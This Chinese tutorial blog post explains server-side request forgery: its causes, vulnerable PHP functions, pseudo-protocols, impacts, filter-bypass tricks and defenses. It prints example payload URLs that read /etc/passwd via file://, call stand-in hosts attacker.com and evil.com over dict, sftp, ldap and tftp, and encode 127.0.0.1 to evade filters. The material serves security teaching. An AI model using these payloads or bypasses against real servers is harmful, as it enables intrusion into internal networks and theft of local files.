SSRF漏洞原理与防御

一、SSRF简介

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。
一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)

二、SSRF漏洞原理

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。、

用户不可访问服务器B,但可以访问服务器A,且服务器A可以向服务器B发起请求,用户就可以通过服务器A向服务器B发起请求。

比如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的web应用作为代理攻击远程和本地的服务器

三、SSRF漏洞挖掘

1、通过URL地址分享网页内容
2、转码服务
3、在线翻译
4、能够对外发起网络请求的地方,就可能存在SSRF漏洞。

四、产生SSRF漏洞的函数

curl_exec()
用于发送HTTP请求,如果没有对用户输入进行过滤,攻击者可以通过构造恶意URL来实现SSRF攻击。

file_get_contents()
用于读取文件内容,如果没有对用户输入进行过滤,攻击者可以通过构造file://伪协议来读取敏感文件,如/etc/passwd等。

get_headers()和fsockopen()
用于获取HTTP响应头信息,如果没有对用户输入进行过滤,攻击者可以通过构造恶意URL来获取敏感信息,如服务器版本、目录结构等。

imagecreatefromjpeg()imagecreatefrompng()
这些函数用于处理图片文件,如果没有对用户上传的图片进行过滤,攻击者可以通过构造特定的图片文件来实现SSRF攻击。

simplexml_load_file()xmlrpc_decode()
这些函数用于处理XML数据,如果没有对用户输入进行过滤,攻击者可以通过构造特定的XML数据来实现SSRF攻击。

五、SSRF中的伪协议

1、file
该伪协议用于读取本地文件系统中的文件。攻击者可以通过构造file://协议来读取服务器上的敏感文件,如

http://example.com/ssrf.php?url=file:///etc/passwd
http://example.com/ssrf.php?url=file:///C:/Windows/win.ini

2、dict
该伪协议用于查询字典。攻击者可以通过构造dict://协议来发送恶意请求,如执行任意命令、读取敏感文件等。可以构造dict://example.com:8888/ 来探测目标8888端口是否开放

http://example.com/ssrf.php?dict://attacker.com:8888/

3、sftp
在这里,Sftp代表SSH文件传输协议(SSH File Transfer Protocol),或安全文件传输协议(Secure File Transfer Protocol),这是一种与SSH打包在一起的单独协议,它运行在安全连接上,并以类似的方式进行工作。

http://example.com/ssrf.php?url=sftp://evil.com:1337/

4、ldap://或ldaps:// 或ldapi://
LDAP代表轻量级目录访问协议。它是IP网络上的一种用于管理和访问分布式目录信息服务的应用程序协议。

http://example.com/ssrf.php?url=ldap://attacker.com:1337/%0astats%0aquit
攻击者可以将服务器的LDAP请求重定向到attacker.com主机上的恶意LDAP服务器,从而可能导致信息泄露、远程代码执行等安全问题。

5、tftp://
TFTP(Trivial File Transfer Protocol,简单文件传输协议)是一种简单的基于lockstep机制的文件传输协议,它允许客户端从远程主机获取文件或将文件上传至远程主机。

tftp://attacker.com/file.txt
攻击者可以将服务器的TFTP请求重定向到attacker.com主机上的恶意TFTP服务器,从而可能导致文件泄露、远程代码执行等安全问题。

6、gopher://
Gopher是一种分布式文档传递服务。利用该服务,用户可以无缝地浏览、搜索和检索驻留在不同位置的信息。

六、SSRF漏洞危害

1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息;

2.攻击运行在内网或本地的应用程序(比如溢出);

3.对内网web应用进行指纹识别,通过访问默认文件实现;

4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli等);

5.利用file协议读取本地文件等。.

6.各个协议调用探针:http,file,dict,ftp,gopher等

七、SSRF绕过方式

1、限制为http://www.xxx.com 域名时(利用@)

可以尝试采用http基本身份认证的方式绕过
http://www.xxx.com@www.example.com

2.采用短网址绕过

可以将受限制的目标地址转换为一个短网址,并将该短网址作为攻击载荷发送给目标服务器。当服务器解析短网址时,它会重定向到真实的目标地址,从而绕过对目标地址的限制
比百度短网址https://dwz.cn/

3.采用进制转换

127.0.0.1
八进制:0177.0.0.1
十六进制:0x7f.0.0.1
十进制:2130706433

4.利用句号

127。0。0。1 >>> 127.0.0.1

八、SSRF漏防御

1、过滤返回信息,验证远程服务器对请求的响应是比较容易的方法。如果web应用是去获取某一种类型的文件。那么在把返回结果展示给用户之前先验证返回的信息是否符合标准。
2、统一错误信息,避免用户可以根据错误信息来判断远端服务器的端口状态。
3、限制请求的端口为http常用的端口,比如,80,443,8080,8090。
4、黑名单内网ip。避免应用被用来获取获取内网数据,攻击内网。
5、禁用不需要的协议。仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp:// 等引起的问题。
6、禁止不常用的协议,仅仅允许http和https请求。可以防止类似于file:///,gopher://,ftp://等引起的问题。
7、使用DNS缓存或者Host白名单的方式。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
引用中提到了SSRF(Server-Side Request Forgery:服务器端请求伪造)的概述和形成原因。SSRF的形成往往是由于服务端提供了从其他服务器获取数据的功能,但没有对目标地址进行严格过滤与限制,导致攻击者可以传入任意地址来让后端服务器对其发起请求,并返回目标地址的数据。在PHP中,如果使用file_get_contents()、fsockopen()、curl_exec()等函数时使用不当,就会导致SSRF漏洞的产生。为了防止SSRF漏洞,需要对目标地址进行过滤和限制。中提到了一些攻击方式,如攻击运行在内网的系统或应用程序,获取内网系统的弱口令进行内网漫游,并对有漏洞的内网Web应用实施攻击获取Webshell。中提到了通过SSRF漏洞可以获取目标服务器的banner信息,并进一步进行扫描和探测,获取更多的内网资源,从而进行更进一步的攻击。SSRF的问题在于,前端传入的URL被后台使用curl_exec()进行请求,然后将请求的结果返回给前端。除了HTTP/HTTPS协议,curl还支持其他一些协议,如FTP、FTPS、GOPHER、TELNET、DICT、FILE以及LDAP等。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [SSRF漏洞原理和实验](https://blog.csdn.net/gl620321/article/details/90737148)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [SSRF漏洞分析与实践笔记](https://blog.csdn.net/lm19770429/article/details/108574028)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [10-3ssrf漏洞原理和案例实验演示](https://blog.csdn.net/m0_53008479/article/details/125693390)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值